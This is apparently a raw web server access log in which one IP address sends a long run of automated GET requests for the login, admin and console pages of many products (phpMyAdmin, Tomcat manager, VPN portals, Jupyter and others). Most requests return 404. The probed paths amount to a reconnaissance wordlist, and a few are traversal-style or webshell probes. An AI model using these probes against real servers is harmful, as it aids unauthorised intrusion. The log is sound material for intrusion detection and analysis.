195.164.49.69 - - [20/Oct/2024:21:08:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:08:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:08:35 +0000] GET /hangfire HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:08:37 +0000] GET /console HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:08:39 +0000] GET /login.asp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:08:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:08:43 +0000] GET /arsys/shared/login.jsp HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:08:45 +0000] GET /rsso/admin/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:08:47 +0000] GET /nagios HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:21:08:49 +0000] GET /nagios3 HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:08:52 +0000] GET /dashboard/auth/login/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:08:54 +0000] GET /horizon/auth/login/?next=/horizon/ HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:08:55 +0000] GET /auth/login/?next=/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:08:58 +0000] GET /login/login.htm HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:09:00 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:09:02 +0000] GET /portal/webclient/index.html HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:21:09:04 +0000] GET /arcgis/rest/services HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:09:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:09:08 +0000] GET /cacti/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:09:10 +0000] GET /tips/tipsLogin.action HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:21:09:12 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:09:14 +0000] GET /carbon/admin/login.jsp HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:09:16 +0000] GET /signin HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:21:09:18 +0000] GET /royal_event/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:09:21 +0000] GET /sessions/new HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:09:24 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:09:26 +0000] GET /ocsreports HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:09:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:09:30 +0000] GET /authorization.do HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:09:32 +0000] GET /chronos.wsc/asparamlogin.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:09:34 +0000] GET /m/ HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:21:09:36 +0000] GET /account/login HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:21:09:39 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:09:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:09:42 +0000] GET /qmailadmin/qmailadmin.cgi HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:21:09:44 +0000] GET /cgi-bin/qmailadmin/qmailadmin HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:21:09:46 +0000] GET /cgi-bin/qmailadmin HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:09:48 +0000] GET /cgi-ssl/qmailadmin/qmailadmin HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:21:09:51 +0000] GET /synnefoclient/ HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:09:53 +0000] GET /appsuite/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:21:09:55 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:09:57 +0000] GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1 404 1103
77.87.163.227 - - [20/Oct/2024:21:09:57 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [20/Oct/2024:21:09:59 +0000] GET /otobo/index.pl HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:10:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:10:03 +0000] GET /dashboard/auth/login HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:10:05 +0000] GET /accounts/login/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:10:07 +0000] GET /SphinxAuth/Account/Login HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:21:10:10 +0000] GET /login?next=/ HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:10:12 +0000] GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:21:10:14 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:10:16 +0000] GET /browser/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:10:18 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:10:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:10:22 +0000] GET /graph HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:10:24 +0000] GET /prometheus/graph HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:10:27 +0000] GET /login/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:10:28 +0000] GET /login/pre_login_agreement HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:21:10:30 +0000] GET /global-protect/login.esp HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:10:32 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:21:10:35 +0000] GET /sitecore/admin/login.aspx HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:10:37 +0000] GET /ws_ftp.log HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:10:39 +0000] GET /WS_FTP.LOG HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:10:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:10:43 +0000] GET /phpldapadmin HTTP/1.1 404 1086
83.212.98.101 - - [20/Oct/2024:21:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:21:10:45 +0000] GET /htdocs/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:10:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:10:49 +0000] GET /phppgadmin/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:10:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:10:53 +0000] GET /static/dist/assets/icons/icon.png HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:21:10:55 +0000] GET /WebInterface/login.html HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:10:57 +0000] GET /webalizer/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:10:59 +0000] GET /jupyter/login HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:21:11:01 +0000] GET /jupyter/lab HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:11:03 +0000] GET /jupyter/hub/lti/launch HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:21:11:05 +0000] GET /hub/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:21:11:08 +0000] GET /cgi-bin/videoconfiguration.cgi HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:21:11:10 +0000] GET /photo/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:11:12 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:11:14 +0000] GET /ui/ HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:11:16 +0000] GET /webclient/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:11:18 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:11:20 +0000] GET /en/login HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:11:22 +0000] GET /MyDevice/Login HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:11:25 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:11:27 +0000] GET /ui/ HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:11:29 +0000] GET /api/xml HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:11:31 +0000] GET /cgi-bin/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:11:33 +0000] GET /cgi-bin/html/login.html HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:11:35 +0000] GET /EWS/Exchange.asmx HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:11:37 +0000] GET /owa/service.svc HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:11:39 +0000] GET /qlikview/FormLogin.htm HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:21:11:41 +0000] GET /Main_Login.asp HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:11:43 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:11:45 +0000] GET /auth/manager/sign-in/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:11:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:11:49 +0000] GET /lucee/admin/web.cfm HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:11:51 +0000] GET /lucee/admin/server.cfm HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:11:53 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:11:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:11:57 +0000] GET /names.nsf HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:11:59 +0000] GET /webredir.nsf HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:12:01 +0000] GET /versa/login.html HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:12:04 +0000] GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:12:06 +0000] GET /thruk/cgi-bin/login.cgi?thruk/ HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:12:08 +0000] GET /configurations HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:12:10 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:12:12 +0000] GET /favicon.ico HTTP/1.1 200 21630
195.164.49.69 - - [20/Oct/2024:21:12:14 +0000] GET /images/favicon.ico HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:12:16 +0000] GET /login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:12:18 +0000] GET /AirWatch/Login HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:12:19 +0000] GET /apps/zxtm/login.cgi HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:12:22 +0000] GET /logon/LogonPoint/tmindex.html HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:21:12:24 +0000] GET /atg/bcc HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:12:26 +0000] GET /atg/user/html/login.jsp HTTP/1.1 404 1109
83.212.98.101 - - [20/Oct/2024:21:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:21:12:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:12:30 +0000] GET /http/index.html HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:12:32 +0000] GET /CACHE/sdesktop/install/start.htm HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:21:12:34 +0000] GET /ghost/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:12:37 +0000] GET /vnc.html HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:12:51 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:12:54 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:12:56 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:12:58 +0000] GET /admin/airflow/login HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:13:00 +0000] GET /cgi-bin/luci/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:13:02 +0000] GET /Login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:13:04 +0000] GET /ServiceCenter/Login.aspx HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:13:06 +0000] GET /auth-sign-in?appUri=%2F HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:13:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:13:10 +0000] GET /cgi-bin/luci/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:13:12 +0000] GET /login_up.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:13:14 +0000] GET /bonita/login.jsp HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:13:17 +0000] GET /vpn/index.html HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:13:19 +0000] GET /docs HTTP/1.1 302 -
195.164.49.69 - - [20/Oct/2024:21:13:21 +0000] GET /redoc HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:13:23 +0000] GET /openapi.json HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:13:25 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:13:27 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:13:29 +0000] GET /sslvpn_logon.shtml HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:13:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:13:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:13:35 +0000] GET /favicon.ico HTTP/1.1 200 21630
195.164.49.69 - - [20/Oct/2024:21:13:37 +0000] GET /login.sh HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:13:39 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:13:41 +0000] GET /webconsole/webpages/login.jsp HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:21:13:43 +0000] GET /userportal/webpages/myaccount/login.jsp HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:21:13:47 +0000] GET /users/auth/saml/metadata HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:21:14:05 +0000] GET /phpMyAdmin/index.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:14:05 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:14:05 +0000] GET /phpmyadmin/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:14:05 +0000] GET /admin/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:21:14:06 +0000] GET /_phpmyadmin/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:14:06 +0000] GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:21:14:06 +0000] GET /apache-default/phpmyadmin/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:21:14:06 +0000] GET /blog/phpmyadmin/ HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:14:06 +0000] GET /forum/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:21:14:06 +0000] GET /php/phpmyadmin/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:14:06 +0000] GET /typo3/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:21:14:06 +0000] GET /web/phpmyadmin/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:14:07 +0000] GET /xampp/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:21:14:07 +0000] GET /phpMyAdmin/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:14:07 +0000] GET /phpma/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:14:20 +0000] GET /manager/html HTTP/1.1 401 2499
195.164.49.69 - - [20/Oct/2024:21:14:22 +0000] GET /host-manager/html HTTP/1.1 403 3022
195.164.49.69 - - [20/Oct/2024:21:14:24 +0000] GET /Login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:14:26 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:14:28 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:14:30 +0000] GET /app/kibana HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:14:32 +0000] GET /phpminiadmin.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:14:34 +0000] GET /processwire/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:14:36 +0000] GET /Authentication/Login HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:14:38 +0000] GET /workflow/jsp/logon.jsp HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:14:41 +0000] GET /mailman/listinfo HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:14:42 +0000] GET /listinfo HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:14:45 +0000] GET /index.php?v=d HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:14:47 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:14:49 +0000] GET /fileman/index.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:14:51 +0000] GET /fileman/php/fileslist.php HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:14:53 +0000] GET /fileman/asp_net/main.ashx HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:14:55 +0000] GET /servicedesk/customer/user/login HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:21:14:57 +0000] GET /servicedesk/customer/portal/10/user/login HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:21:14:59 +0000] GET /ui/sessions/signin HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:21:15:01 +0000] GET /user/login?redirect=%2F HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:15:03 +0000] GET /crowd/console/login.action HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:21:15:05 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:15:07 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:15:10 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:15:12 +0000] GET /CHANGELOG.md HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:15:14 +0000] GET /glpi/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:15:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:15:18 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:15:20 +0000] GET /webmin/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:15:22 +0000] GET /mobile/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:15:24 +0000] GET /api/v1/info HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:15:26 +0000] GET /index.php?s=/admin/Index/index HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:15:29 +0000] GET /_dashboards/app/login HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:21:15:31 +0000] GET /sslvpn/Login/Login HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:21:15:33 +0000] GET /Login/Login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:15:35 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:15:37 +0000] GET /info HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:21:15:39 +0000] GET /hub HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:21:15:41 +0000] GET /resources/autogenerated/product-info.json HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:21:15:43 +0000] GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1 404 1159
83.212.98.101 - - [20/Oct/2024:21:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:21:15:50 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:15:52 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:15:54 +0000] GET /jw/web/; HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:15:56 +0000] GET /StudioServer/server/apps/login.php HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:21:15:58 +0000] GET /server/apps/login.php HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:21:16:00 +0000] GET /login?redir=/ng HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:16:06 +0000] GET /lui/ HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:16:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:16:11 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:16:13 +0000] GET /hdstat.htm HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:16:15 +0000] GET /h2-console/login.jsp HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:16:17 +0000] GET /signin HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:21:16:19 +0000] GET /console/login/LoginForm.jsp HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:21:16:21 +0000] GET /login.cgi?uri=/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:16:23 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:16:25 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:16:27 +0000] GET /nagvis/frontend/nagvis-js/index.php HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:21:16:30 +0000] GET /manager/signin HTTP/1.1 404 1543
195.164.49.69 - - [20/Oct/2024:21:16:32 +0000] GET /steve/manager/signin HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:16:34 +0000] GET /host-manager/html HTTP/1.1 403 3022
195.164.49.69 - - [20/Oct/2024:21:16:36 +0000] GET /manager/status HTTP/1.1 401 2499
195.164.49.69 - - [20/Oct/2024:21:16:43 +0000] GET /dashboard HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:16:46 +0000] GET /centreon/index.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:16:48 +0000] GET /ui/ HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:16:50 +0000] GET /web HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:21:16:51 +0000] GET /geoserver/web/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:16:54 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:16:56 +0000] GET /juddi/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:16:58 +0000] GET /downloader/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:17:00 +0000] GET /logon/LogonPoint/index.html HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:21:17:02 +0000] GET /logon/LogonPoint/custom.html HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:21:17:04 +0000] GET /web/database/selector/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:21:17:06 +0000] GET /em/console/ias/oc4j/home HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:21:17:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:17:10 +0000] GET /sws/index.html HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:17:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:17:14 +0000] GET /sqlbuddy/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:21:17:16 +0000] GET /mailscanner/login.php HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:21:17:18 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:17:20 +0000] GET /admin/index/login.html HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:17:23 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:17:25 +0000] GET /auth/login HTTP/1.1 404 1088
83.212.98.101 - - [20/Oct/2024:21:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:21:17:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:17:28 +0000] GET /accounts/login/?next=/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:17:31 +0000] GET /web/database/manager HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:17:45 +0000] GET /404 HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:21:17:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:17:49 +0000] GET /auth/admin HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:17:50 +0000] GET /auth/admin/master/console/ HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:21:17:52 +0000] GET /documentation HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:21:17:54 +0000] GET /documentation/login HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:17:57 +0000] GET /versa/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:17:59 +0000] GET /jasperserver/login.html?error=1 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:18:01 +0000] GET /jasperserver-pro/login.html?error=1 HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:18:03 +0000] GET /index.php?owa_do=base.loginForm HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:18:05 +0000] GET /ocpu/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:18:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:18:09 +0000] GET /?path=/settings/about HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:18:12 +0000] GET /dashboard/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:18:14 +0000] GET /login.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:18:16 +0000] GET /ssf/s/portalLogin HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:21:18:18 +0000] GET /login/sls/auth HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:18:20 +0000] GET /login/?next=/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:18:22 +0000] GET /admin/login/?next=/admin/ HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:18:24 +0000] GET /webshell4/login.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:18:26 +0000] GET /cluster/cluster HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:18:29 +0000] GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:21:18:31 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:18:33 +0000] GET / HTTP/1.1 200 11204
